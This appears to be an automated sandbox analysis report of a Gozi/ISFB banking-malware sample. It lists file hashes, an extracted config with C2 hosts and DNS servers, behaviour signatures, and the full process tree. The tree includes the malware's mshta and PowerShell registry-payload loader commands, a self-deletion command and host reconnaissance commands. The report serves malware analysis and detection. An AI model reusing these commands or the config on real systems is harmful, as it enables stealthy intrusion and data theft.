Analysis
-
max time kernel
142s -
max time network
147s -
platform
windows7_x64 -
resource
win7v20201028 -
submitted
28-11-2020 00:43
Static task
static1
Behavioral task
behavioral1
Sample
4448.exe
Resource
win7v20201028
Behavioral task
behavioral2
Sample
4448.exe
Resource
win10v20201028
General
-
Target
4448.exe
-
Size
307KB
-
MD5
3ba71636ccecaedce74887a8744f47f5
-
SHA1
628a557f8952bac80acccf5fb5a110ca7957a40f
-
SHA256
f0477a54192fcb83e719cab38b6ba9e12c677d37ba5b2ea20051ebbf3c9c3995
-
SHA512
d16a2aa6a453ff47093c1249a7ef14f8cb2cc6d928f13fb1db1773c5b351f6e76b4e709a93da094ef4b481c69f272d94cb946d5a36e007a1bf24cee1ab1571d7
Malware Config
Extracted
gozi_ifsb
4448
web.vortex.data.microsoft.com
ocsp.sca1b.amazontrust.com
89.249.65.165
-
dga_season
10
-
dns_servers
107.174.86.134
107.175.127.22
-
exe_type
worker
-
server_id
12
Signatures
-
Deletes itself 1 IoCs
Processes:
cmd.exepid process 1104 cmd.exe -
Drops file in System32 directory 1 IoCs
Processes:
powershell.exedescription ioc process File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe -
Suspicious use of SetThreadContext 4 IoCs
Processes:
powershell.exeExplorer.EXEcmd.exedescription pid process target process PID 1200 set thread context of 1268 1200 powershell.exe Explorer.EXE PID 1268 set thread context of 396 1268 Explorer.EXE iexplore.exe PID 1268 set thread context of 1104 1268 Explorer.EXE cmd.exe PID 1104 set thread context of 724 1104 cmd.exe PING.EXE -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Discovers systems in the same network 1 TTPs 1 IoCs
-
Enumerates processes with tasklist 1 TTPs 1 IoCs
-
Gathers system information 1 TTPs 1 IoCs
Runs systeminfo.exe.
-
Processes:
iexplore.exemshta.exeIEXPLORE.EXEIEXPLORE.EXEdescription ioc process Set value (int) \REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\Main\CompatibilityFlags = "0" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\Main iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\InternetRegistry iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\LowRegistry\DontShowMeThisDialogAgain iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\Toolbar iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch iexplore.exe Set value (str) \REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\Main\FullScreen = "no" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\LowRegistry iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "0" iexplore.exe Set value (data) \REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000000000001000000ffffffffffffffffffffffffffffffff3d0000003d000000c3040000a2020000 iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing iexplore.exe Set value (data) \REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\DecayDateQueue = 01000000d08c9ddf0115d1118c7a00c04fc297eb0100000039e08b06c84715459283081ff7bb5a600000000002000000000010660000000100002000000023ae6b6c6cf09ee96bd0c7fa7ce6598c68c04c78223547f068c2ce64130f025b000000000e8000000002000020000000be88143e913067f3916fe0bf4ffdd520f47180dd95d51737d42ceb17de29f38320000000dcf964d24ac717dc3fb8cebefe3d3cd895afd5850332df8d3b9b3cb8c8b4f0ed40000000e62ee0361946eb8a706bab9a08d0477db9a40a7466ce4e8e19d551320b41721bbb67e8e6e6de4efa2e4e6ca265042c1c3a101c35b4ba69aa1e1f2b42e782b10f iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\BrowserEmulation\LowMic iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\IETld\LowMic iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\IntelliForms iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\Main mshta.exe Key created \REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\MINIE iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch IEXPLORE.EXE Set value (data) \REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\MFV = 01000000d08c9ddf0115d1118c7a00c04fc297eb0100000039e08b06c84715459283081ff7bb5a6000000000020000000000106600000001000020000000a142ed7598072fb79dbccc2698e71dc718a5735690239f4c3244e679cb6544ba000000000e8000000002000020000000964bd263375f7b91a826b433f1ac787acbc35767be6af6acf58b84417f92b38b900000001572bfa2a6d64f4d55c249ee3ba19abcccdb2c25dea19d430d084a343b048a50f6275f67744f234b6e205e722eff6e988e51fa4e9ec5eef0776d1678018fed21f696a22e8a6048772c0366e378c6d2d2e2f81e71e968d6d2a3c0307decbdef0ce78c47f2f0df636e866007de551021023606e0339f77011f9a2e0cc360ee11bee8bd996d71b8a61e0cc8b00034d24ded40000000221ef8a4e1b6cc6c20aedc98a95dda37a02204e92dc73ebc5430bd7787a9735d2fdadc51b582ae23989ec275f1cc66260ec072633d33b449fd7d38b86ac42e88 iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\Toolbar\WebBrowser iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive\{625EEF21-3113-11EB-8332-F65A7312C48E} = "0" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\Main IEXPLORE.EXE Key created \REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\LowRegistry\DOMStorage iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery iexplore.exe Set value (str) \REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" IEXPLORE.EXE Set value (str) \REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" IEXPLORE.EXE Set value (str) \REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch IEXPLORE.EXE Key created \REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\Main IEXPLORE.EXE Key created \REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\GPU iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\PageSetup iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\Zoom iexplore.exe Set value (data) \REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\LastProcessed = 6046822820c5d601 iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\MINIE\TabBandWidth = "500" iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NTPFirstRun = "1" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage iexplore.exe -
Runs net.exe
-
Runs ping.exe 1 TTPs 1 IoCs
-
Suspicious behavior: CmdExeWriteProcessMemorySpam 1 IoCs
Processes:
PING.EXEpid process 724 PING.EXE -
Suspicious behavior: EnumeratesProcesses 4 IoCs
Processes:
4448.exepowershell.exeExplorer.EXEpid process 1744 4448.exe 1200 powershell.exe 1200 powershell.exe 1268 Explorer.EXE -
Suspicious behavior: MapViewOfSection 4 IoCs
Processes:
powershell.exeExplorer.EXEcmd.exepid process 1200 powershell.exe 1268 Explorer.EXE 1268 Explorer.EXE 1104 cmd.exe -
Suspicious use of AdjustPrivilegeToken 2 IoCs
Processes:
powershell.exetasklist.exedescription pid process Token: SeDebugPrivilege 1200 powershell.exe Token: SeDebugPrivilege 1780 tasklist.exe -
Suspicious use of FindShellTrayWindow 3 IoCs
Processes:
iexplore.exepid process 396 iexplore.exe 396 iexplore.exe 396 iexplore.exe -
Suspicious use of SetWindowsHookEx 13 IoCs
Processes:
iexplore.exeIEXPLORE.EXEIEXPLORE.EXEExplorer.EXEpid process 396 iexplore.exe 396 iexplore.exe 1816 IEXPLORE.EXE 1816 IEXPLORE.EXE 396 iexplore.exe 396 iexplore.exe 1648 IEXPLORE.EXE 1648 IEXPLORE.EXE 396 iexplore.exe 396 iexplore.exe 1816 IEXPLORE.EXE 1816 IEXPLORE.EXE 1268 Explorer.EXE -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
iexplore.exemshta.exepowershell.execsc.execsc.exeExplorer.EXEcmd.execmd.execmd.exedescription pid process target process PID 396 wrote to memory of 1816 396 iexplore.exe IEXPLORE.EXE PID 396 wrote to memory of 1816 396 iexplore.exe IEXPLORE.EXE PID 396 wrote to memory of 1816 396 iexplore.exe IEXPLORE.EXE PID 396 wrote to memory of 1816 396 iexplore.exe IEXPLORE.EXE PID 396 wrote to memory of 1648 396 iexplore.exe IEXPLORE.EXE PID 396 wrote to memory of 1648 396 iexplore.exe IEXPLORE.EXE PID 396 wrote to memory of 1648 396 iexplore.exe IEXPLORE.EXE PID 396 wrote to memory of 1648 396 iexplore.exe IEXPLORE.EXE PID 1760 wrote to memory of 1200 1760 mshta.exe powershell.exe PID 1760 wrote to memory of 1200 1760 mshta.exe powershell.exe PID 1760 wrote to memory of 1200 1760 mshta.exe powershell.exe PID 1200 wrote to memory of 1036 1200 powershell.exe csc.exe PID 1200 wrote to memory of 1036 1200 powershell.exe csc.exe PID 1200 wrote to memory of 1036 1200 powershell.exe csc.exe PID 1036 wrote to memory of 1756 1036 csc.exe cvtres.exe PID 1036 wrote to memory of 1756 1036 csc.exe cvtres.exe PID 1036 wrote to memory of 1756 1036 csc.exe cvtres.exe PID 1200 wrote to memory of 516 1200 powershell.exe csc.exe PID 1200 wrote to memory of 516 1200 powershell.exe csc.exe PID 1200 wrote to memory of 516 1200 powershell.exe csc.exe PID 516 wrote to memory of 1792 516 csc.exe cvtres.exe PID 516 wrote to memory of 1792 516 csc.exe cvtres.exe PID 516 wrote to memory of 1792 516 csc.exe cvtres.exe PID 1200 wrote to memory of 1268 1200 powershell.exe Explorer.EXE PID 1200 wrote to memory of 1268 1200 powershell.exe Explorer.EXE PID 1200 wrote to memory of 1268 1200 powershell.exe Explorer.EXE PID 1268 wrote to memory of 396 1268 Explorer.EXE iexplore.exe PID 1268 wrote to memory of 1104 1268 Explorer.EXE cmd.exe PID 1268 wrote to memory of 1104 1268 Explorer.EXE cmd.exe PID 1268 wrote to memory of 1104 1268 Explorer.EXE cmd.exe PID 1268 wrote to memory of 1104 1268 Explorer.EXE cmd.exe PID 1268 wrote to memory of 396 1268 Explorer.EXE iexplore.exe PID 1268 wrote to memory of 396 1268 Explorer.EXE iexplore.exe PID 1268 wrote to memory of 1104 1268 Explorer.EXE cmd.exe PID 1268 wrote to memory of 1104 1268 Explorer.EXE cmd.exe PID 1104 wrote to memory of 724 1104 cmd.exe PING.EXE PID 1104 wrote to memory of 724 1104 cmd.exe PING.EXE PID 1104 wrote to memory of 724 1104 cmd.exe PING.EXE PID 1104 wrote to memory of 724 1104 cmd.exe PING.EXE PID 1104 wrote to memory of 724 1104 cmd.exe PING.EXE PID 1104 wrote to memory of 724 1104 cmd.exe PING.EXE PID 1268 wrote to memory of 1396 1268 Explorer.EXE cmd.exe PID 1268 wrote to memory of 1396 1268 Explorer.EXE cmd.exe PID 1268 wrote to memory of 1396 1268 Explorer.EXE cmd.exe PID 1396 wrote to memory of 1916 1396 cmd.exe nslookup.exe PID 1396 wrote to memory of 1916 1396 cmd.exe nslookup.exe PID 1396 wrote to memory of 1916 1396 cmd.exe nslookup.exe PID 1268 wrote to memory of 1860 1268 Explorer.EXE cmd.exe PID 1268 wrote to memory of 1860 1268 Explorer.EXE cmd.exe PID 1268 wrote to memory of 1860 1268 Explorer.EXE cmd.exe PID 1860 wrote to memory of 536 1860 cmd.exe nslookup.exe PID 1860 wrote to memory of 536 1860 cmd.exe nslookup.exe PID 1860 wrote to memory of 536 1860 cmd.exe nslookup.exe PID 1268 wrote to memory of 1728 1268 Explorer.EXE cmd.exe PID 1268 wrote to memory of 1728 1268 Explorer.EXE cmd.exe PID 1268 wrote to memory of 1728 1268 Explorer.EXE cmd.exe PID 1268 wrote to memory of 968 1268 Explorer.EXE cmd.exe PID 1268 wrote to memory of 968 1268 Explorer.EXE cmd.exe PID 1268 wrote to memory of 968 1268 Explorer.EXE cmd.exe PID 1268 wrote to memory of 1640 1268 Explorer.EXE cmd.exe PID 1268 wrote to memory of 1640 1268 Explorer.EXE cmd.exe PID 1268 wrote to memory of 1640 1268 Explorer.EXE cmd.exe PID 1268 wrote to memory of 644 1268 Explorer.EXE makecab.exe PID 1268 wrote to memory of 644 1268 Explorer.EXE makecab.exe
Processes
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\4448.exe"C:\Users\Admin\AppData\Local\Temp\4448.exe"2⤵
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\System32\mshta.exe"C:\Windows\System32\mshta.exe" "about:<hta:application><script>resizeTo(1,1);eval(new ActiveXObject('WScript.Shell').regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\CB4B3BAF-AEAE-3526-102F-C23944D3167D\\\Auxisext'));if(!window.flag)close()</script>"2⤵
- Modifies Internet Explorer settings
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" iex ([System.Text.Encoding]::ASCII.GetString(( gp "HKCU:Software\AppDataLow\Software\Microsoft\CB4B3BAF-AEAE-3526-102F-C23944D3167D").aepiesrv))3⤵
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\mhwodcsb\mhwodcsb.cmdline"4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES3A90.tmp" "c:\Users\Admin\AppData\Local\Temp\mhwodcsb\CSC30A71AC164AD49BBB8204E57CB4BB5B.TMP"5⤵
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\b2mptg01\b2mptg01.cmdline"4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES3B1D.tmp" "c:\Users\Admin\AppData\Local\Temp\b2mptg01\CSC591C21F4ECC24EE9A21A6767EAA8B54.TMP"5⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C ping localhost -n 5 && del "C:\Users\Admin\AppData\Local\Temp\4448.exe"2⤵
- Deletes itself
- Suspicious use of SetThreadContext
- Suspicious behavior: MapViewOfSection
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\PING.EXEping localhost -n 53⤵
- Runs ping.exe
- Suspicious behavior: CmdExeWriteProcessMemorySpam
-
C:\Windows\system32\cmd.execmd /C "nslookup myip.opendns.com resolver1.opendns.com > C:\Users\Admin\AppData\Local\Temp\2304.bi1"2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\nslookup.exenslookup myip.opendns.com resolver1.opendns.com3⤵
-
C:\Windows\system32\cmd.execmd /C "nslookup myip.opendns.com resolver1.opendns.com > C:\Users\Admin\AppData\Local\Temp\750.bi1"2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\nslookup.exenslookup myip.opendns.com resolver1.opendns.com3⤵
-
C:\Windows\system32\cmd.execmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\2304.bi1"2⤵
-
C:\Windows\system32\cmd.execmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\750.bi1"2⤵
-
C:\Windows\system32\cmd.execmd /C "systeminfo.exe > C:\Users\Admin\AppData\Local\Temp\32B8.bin1"2⤵
-
C:\Windows\system32\systeminfo.exesysteminfo.exe3⤵
- Gathers system information
-
C:\Windows\system32\makecab.exemakecab.exe /F "C:\Users\Admin\AppData\Local\Temp\496A.bin"2⤵
-
C:\Windows\system32\makecab.exemakecab.exe /F "C:\Users\Admin\AppData\Local\Temp\E78E.bin"2⤵
-
C:\Windows\system32\cmd.execmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\32B8.bin1"2⤵
-
C:\Windows\system32\cmd.execmd /C "net view >> C:\Users\Admin\AppData\Local\Temp\32B8.bin1"2⤵
-
C:\Windows\system32\net.exenet view3⤵
- Discovers systems in the same network
-
C:\Windows\system32\cmd.execmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\32B8.bin1"2⤵
-
C:\Windows\system32\cmd.execmd /C "nslookup 127.0.0.1 >> C:\Users\Admin\AppData\Local\Temp\32B8.bin1"2⤵
-
C:\Windows\system32\nslookup.exenslookup 127.0.0.13⤵
-
C:\Windows\system32\cmd.execmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\32B8.bin1"2⤵
-
C:\Windows\system32\cmd.execmd /C "tasklist.exe /SVC >> C:\Users\Admin\AppData\Local\Temp\32B8.bin1"2⤵
-
C:\Windows\system32\tasklist.exetasklist.exe /SVC3⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\cmd.execmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\32B8.bin1"2⤵
-
C:\Windows\system32\cmd.execmd /C "driverquery.exe >> C:\Users\Admin\AppData\Local\Temp\32B8.bin1"2⤵
-
C:\Windows\system32\driverquery.exedriverquery.exe3⤵
-
C:\Windows\system32\cmd.execmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\32B8.bin1"2⤵
-
C:\Windows\system32\cmd.execmd /C "reg.exe query "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall" /s >> C:\Users\Admin\AppData\Local\Temp\32B8.bin1"2⤵
-
C:\Windows\system32\reg.exereg.exe query "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall" /s3⤵
-
C:\Windows\system32\cmd.execmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\32B8.bin1"2⤵
-
C:\Windows\system32\cmd.execmd /U /C "type C:\Users\Admin\AppData\Local\Temp\32B8.bin1 > C:\Users\Admin\AppData\Local\Temp\32B8.bin & del C:\Users\Admin\AppData\Local\Temp\32B8.bin1"2⤵
-
C:\Windows\system32\makecab.exemakecab.exe /F "C:\Users\Admin\AppData\Local\Temp\EBD2.bin"2⤵
-
C:\Program Files\Internet Explorer\iexplore.exe"C:\Program Files\Internet Explorer\iexplore.exe" -Embedding1⤵
- Modifies Internet Explorer settings
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
-
C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:396 CREDAT:275457 /prefetch:22⤵
- Modifies Internet Explorer settings
- Suspicious use of SetWindowsHookEx
-
C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:396 CREDAT:668677 /prefetch:22⤵
- Modifies Internet Explorer settings
- Suspicious use of SetWindowsHookEx
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\Microsoft\Internet Explorer\imagestore\w5ukms8\imagestore.datMD5
8170668a7e1917d247bf57831c8bbdf0
SHA1816e71f9296f6b2672d4aecd31c88afd147f9df2
SHA25636c337fd4102004183c806538a63ac6c51a0d50b43a1e91192d86d70effbbaa8
SHA5125228c6c9ed8c83fd45366d3d0e23ba4a4dc6c300621243cdbab74b947e74a04595e571781cfc9e3475fac5016b32499b68d4898520c82b446c10cd9697913f8a
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\D73194RS\favicon[1].icoMD5
f74755b4757448d71fdcb4650a701816
SHA10bcbe73d6a198f6e5ebafa035b734a12809cefa6
SHA256e78286d0f5dfa2c85615d11845d1b29b0bfec227bc077e74cb1ff98ce8df4c5a
SHA512e0fb5f740d67366106e80cbf22f1da3cf1d236fe11f469b665236ec8f7c08dea86c21ec8f8e66fc61493d6a8f4785292ce911d38982dbfa7f5f51dadebcc8725
-
C:\Users\Admin\AppData\Local\Temp\13EE.bin\AuthRoot.pfxMD5
d6387e77baf28f83e233182fdc06fa44
SHA146ad61329e19c49ef3c5c62f155dffc6970dbbe1
SHA256f1b8c8c581be7652d3b28b90e5c978dac189359c4eed6dac7dbeb47b003f4f44
SHA512a42a7588b93158b2cff14a1bc162fb9ff3d2ae2a68aa7b09c2c120c26e07ad46e4b96a82c3ab639f035af3424495b7a63ee40ee0de199a8588232410e85cbfaf
-
C:\Users\Admin\AppData\Local\Temp\13EE.bin\Disallowed.pfxMD5
4e9d769423a90cdbffffc29b7b215e56
SHA1f50231a7bd9c8964a90a340f7e6e73c574b9835d
SHA256b8e718b7955e82b88f56916089e6bc882863d390e3278da271e03c5d93899597
SHA5127b9f9bf8cc18f86bdede1d215d80265bed9a333dc6a08ec4027e6db783b32597e5fd0625c382c3f719a7b39ac793414c70820666ae8bee86242df289b0b361d8
-
C:\Users\Admin\AppData\Local\Temp\13EE.bin\Root.pfxMD5
17f6a7958f7dbb297cd422b5b78d1e87
SHA19086a0e242a0d89e4a510996351f2226d8075572
SHA2567a2d6c0d228ae169b1f75cb22149bf4ee9cbdd193cad01b18e9b8e839c4d5336
SHA512fb912b507cf1df447397bb7f199a7ea55cdb6cf5f41d76299f948ec278d0e1ce636aa6c7ffe6a03c82ab2cb06c793c72dfa39acaa7a11af06e1eb7904ed0fef3
-
C:\Users\Admin\AppData\Local\Temp\13EE.bin\setup.infMD5
2b396128667b04140ef82e1bd3d30815
SHA1fe2a9abd8151b6f13cc4f8001b53976a0d908d3e
SHA256a818a16f4c9000e79ff7bdb41742736c64af0814fd52d21399be41ee5fb7e814
SHA5129cbd91e697df11e1b937e19ca0690f6ef92fee92acd415e001f7e8d76bcfc7ca70222723e7f9571302e372f747c1e425f7508e32248d03406015481820d82f25
-
C:\Users\Admin\AppData\Local\Temp\13EE.bin\setup.rptMD5
45c8797d50b8240901dae3fc9dfc2c7f
SHA15e1d77ac3352b90ff3fbc4c55a6b09d8347a7f9f
SHA256ea8ca91c534fb3276e307407624e6a638819445f13b83d839e560d71269a3e9e
SHA5128b841f761101323d79f9a76c931071920b0558790e523137aff5b7d828e3d90ec8efe4b117774f5c97817155c3a9a8dce9c56fa97940d822443cde718b5d7a1d
-
C:\Users\Admin\AppData\Local\Temp\2304.bi1MD5
c4f77466fa6bb3b7b587745fd51eb73e
SHA1c9ee49b895e2cec4483b9e3d84e32f0d650edcbb
SHA25637d5f9a9a4db772e5bcc6a0211a3092049c09f438067bc36cde152e10b79eeb8
SHA51251c1ddeac48567d106cbcc5bad19b31639b73ec66d11ed83dbc90da880792df0b6bd6c6e28a712e854ceeb6bd96a3985e521cb9d666b0ccd087e96f4a90fc7d7
-
C:\Users\Admin\AppData\Local\Temp\2304.bi1MD5
c4f77466fa6bb3b7b587745fd51eb73e
SHA1c9ee49b895e2cec4483b9e3d84e32f0d650edcbb
SHA25637d5f9a9a4db772e5bcc6a0211a3092049c09f438067bc36cde152e10b79eeb8
SHA51251c1ddeac48567d106cbcc5bad19b31639b73ec66d11ed83dbc90da880792df0b6bd6c6e28a712e854ceeb6bd96a3985e521cb9d666b0ccd087e96f4a90fc7d7
-
C:\Users\Admin\AppData\Local\Temp\32B8.binMD5
9cb237b01bdc88ebc88e8c7096f4ef24
SHA18fe0f75d7d826e12b1941c996869644797f06cf6
SHA25647ccc0e567d32c7f7c4ab8a9c3528ae7b8d96669eb821db0650f1e8898905a6d
SHA512f33a5a58d92b8ce53aa15743b9663a94a17b2115e098a04ec8a6be65d5204cc25c53b7c0d9a653ab9fe93e159731c95c3d7676f767f8deb17a3e1511c783d0bf
-
C:\Users\Admin\AppData\Local\Temp\32B8.binMD5
9cb237b01bdc88ebc88e8c7096f4ef24
SHA18fe0f75d7d826e12b1941c996869644797f06cf6
SHA25647ccc0e567d32c7f7c4ab8a9c3528ae7b8d96669eb821db0650f1e8898905a6d
SHA512f33a5a58d92b8ce53aa15743b9663a94a17b2115e098a04ec8a6be65d5204cc25c53b7c0d9a653ab9fe93e159731c95c3d7676f767f8deb17a3e1511c783d0bf
-
C:\Users\Admin\AppData\Local\Temp\32B8.bin1MD5
b639463e733c2db24954535e40380f72
SHA1377bdc5e0f13d062e7df426d8dbd37b644060565
SHA256f94d6d8ca75f7d7fab7483fed14fed7bfd0e3380e2174b624541502e4d3facbd
SHA512096ed8dc2a4eed9765d7c1bc6d320a3efa25c1bca3597faad66a5a3aeee7781390659881736b68c225b8960528152f7b2fb8ffcff9ce732f7cf5995f6a5202a0
-
C:\Users\Admin\AppData\Local\Temp\32B8.bin1MD5
20b350cf65330497f10dc1733f94dbdc
SHA118bf21908827ccf01b432f7a91ee70dd6a4762b9
SHA256c15398a1b37efb9235adb96dd7cb02347e778fa745a2c4a37aedd6d291f21c8d
SHA512eb68c7c6e851db2242c7e604fd37d355908e8f96736acb48f7a46c4af022974f9f60ce471e9a0b4efd15dbabc7320a12910807e03b83f1cb9a27d0f231f3bf52
-
C:\Users\Admin\AppData\Local\Temp\32B8.bin1MD5
7f4045b07ff2086761dca8d35a9b4fe5
SHA169a3729e7d5c7075f4665ad233e4b71e53abc5b2
SHA2565e1c3e5ab60d40e2997485b7b23d6bbe4354665fdb2c776c17a37f2daa86574e
SHA51281cb533be44eef0d8534ae9cbb2a6dc70abcea1b0049bc7413eccd40420d8e4891b2280871cbdabadacd8dbba9af245b66e9fc07e6db3faa95a5ac6d5b001243
-
C:\Users\Admin\AppData\Local\Temp\32B8.bin1MD5
7f4045b07ff2086761dca8d35a9b4fe5
SHA169a3729e7d5c7075f4665ad233e4b71e53abc5b2
SHA2565e1c3e5ab60d40e2997485b7b23d6bbe4354665fdb2c776c17a37f2daa86574e
SHA51281cb533be44eef0d8534ae9cbb2a6dc70abcea1b0049bc7413eccd40420d8e4891b2280871cbdabadacd8dbba9af245b66e9fc07e6db3faa95a5ac6d5b001243
-
C:\Users\Admin\AppData\Local\Temp\32B8.bin1MD5
48117fd7fea1cb8a07007763e6f08e46
SHA117071d86aa287e7450748b2fa1bf43947ad91a6d
SHA2566b42aa7045fc99f349e39611aa3cf29d996725cb74a1b0508f5fa260aaa44dfd
